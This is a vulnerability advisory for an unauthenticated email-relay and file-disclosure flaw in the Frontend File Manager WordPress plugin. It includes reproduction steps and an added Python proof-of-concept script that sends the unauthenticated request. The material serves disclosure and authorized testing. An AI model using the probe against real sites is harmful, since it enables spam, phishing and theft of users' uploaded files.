Frontend File Manager WordPress Plugin Unauthenticated Email Relay Vulnerability

Vulnerability

The Frontend File Manager WordPress plugin, in versions through 23.5, exposes the 'wpfm_send_file_in_email' admin-ajax action to unauthenticated visitors and performs no authentication or authorization check before sending the requested email. Because the request itself supplies the recipient address and the message body, the site can be used as an open relay for spam or phishing. Because the request also supplies the ID of the file to share, and file IDs are guessable, an attacker can enumerate IDs and have other users' uploaded files emailed to an address they control, exposing potentially sensitive content.

Impact

An attacker can send arbitrary email that originates from the affected site, enabling spam and phishing campaigns that carry the site's identity. The same request path also discloses uploaded files to unauthorized recipients: by guessing file IDs, an attacker can retrieve files belonging to other users and any sensitive information they contain.

Reproduction

To reproduce, send an unauthenticated POST request to 'wp-admin/admin-ajax.php' with the parameter 'action' set to 'wpfm_send_file_in_email', together with a file ID, a recipient email address and a message. A vulnerable site responds with a success message indicating that the file has been shared, and the recipient receives the email. Note that a successful reproduction really does send mail from the target, so use a recipient address you control and a site you are authorized to test.
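The request above, written out as an added verification script (this is not code from the advisory or from the plugin). The advisory names the fields (file ID, email address, message) but not their exact POST keys, so the keys 'file_id', 'email' and 'message' used here are assumptions and may need to be adjusted against the plugin's own JavaScript. The response check relies on standard WordPress behaviour: admin-ajax.php answers a request for an action that has no unauthenticated handler with HTTP 400 and the body '0', so any other answer means the unauthenticated handler actually ran.

```python
"""Probe for the unauthenticated wpfm_send_file_in_email admin-ajax action.

Example code added to illustrate the reproduction steps; not the plugin's code.
Only run it against a site you are authorized to test, with a recipient address
you control, because a vulnerable site will send a real email.
"""
import argparse
import urllib.error
import urllib.parse
import urllib.request

ACTION = "wpfm_send_file_in_email"
AJAX_PATH = "wp-admin/admin-ajax.php"


def build_request(base_url: str, file_id: int, recipient: str,
                  message: str) -> urllib.request.Request:
    """Build the unauthenticated POST described in the advisory.

    No cookie or nonce is attached on purpose: the point of the test is that
    the action works without them.
    """
    endpoint = urllib.parse.urljoin(base_url.rstrip("/") + "/", AJAX_PATH)
    fields = {
        "action": ACTION,
        "file_id": str(file_id),   # ASSUMED parameter name
        "email": recipient,        # ASSUMED parameter name
        "message": message,        # ASSUMED parameter name
    }
    body = urllib.parse.urlencode(fields).encode()
    return urllib.request.Request(
        endpoint,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )


def classify_response(status: int, body: str) -> str:
    """Interpret the admin-ajax answer.

    WordPress core replies to an action with no wp_ajax_nopriv_ handler with
    HTTP 400 and the bare body "0". Anything else means the plugin's
    unauthenticated handler executed, i.e. the site is exposed.
    """
    if status == 400 and body.strip() == "0":
        return "handler-not-registered"
    return "handler-executed"


def probe(base_url: str, file_id: int, recipient: str, message: str) -> str:
    """Send one request and classify the result (performs real network I/O)."""
    req = build_request(base_url, file_id, recipient, message)
    try:
        with urllib.request.urlopen(req, timeout=15) as resp:
            return classify_response(resp.status,
                                     resp.read().decode(errors="replace"))
    except urllib.error.HTTPError as err:
        # 4xx/5xx are raised as exceptions but still carry the body we need.
        return classify_response(err.code, err.read().decode(errors="replace"))


if __name__ == "__main__":
    parser = argparse.ArgumentParser(description=__doc__)
    parser.add_argument("base_url", help="site root, e.g. https://blog.example.test")
    parser.add_argument("recipient", help="an address YOU control")
    parser.add_argument("--file-id", type=int, default=1,
                        help="file ID to request (IDs are guessable)")
    parser.add_argument("--message", default="authorized security test")
    args = parser.parse_args()
    print(probe(args.base_url, args.file_id, args.recipient, args.message))
```

A result of 'handler-not-registered' only shows that no unauthenticated handler exists for the action (plugin absent, deactivated, or no longer registering the nopriv hook); it says nothing about the authenticated code path. A result of 'handler-executed' together with the success message described above, and the email arriving in your mailbox, confirms the issue.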

Added: Feb 17, 2026, 7:18 AM
Updated: Feb 17, 2026, 7:18 AM

Vulnerability Rating

Custom Algorithm
spread: 1.0
impact: 3.8
exploitability: 9.7
remediation: 0.0
relevance: 3.1
threat: 6.5
urgency: 2.9
incentive: 8.3

Our algorithm analyzes dozens of metrics to generate these 8 key vulnerability categories, which are then combined to calculate the overall risk score.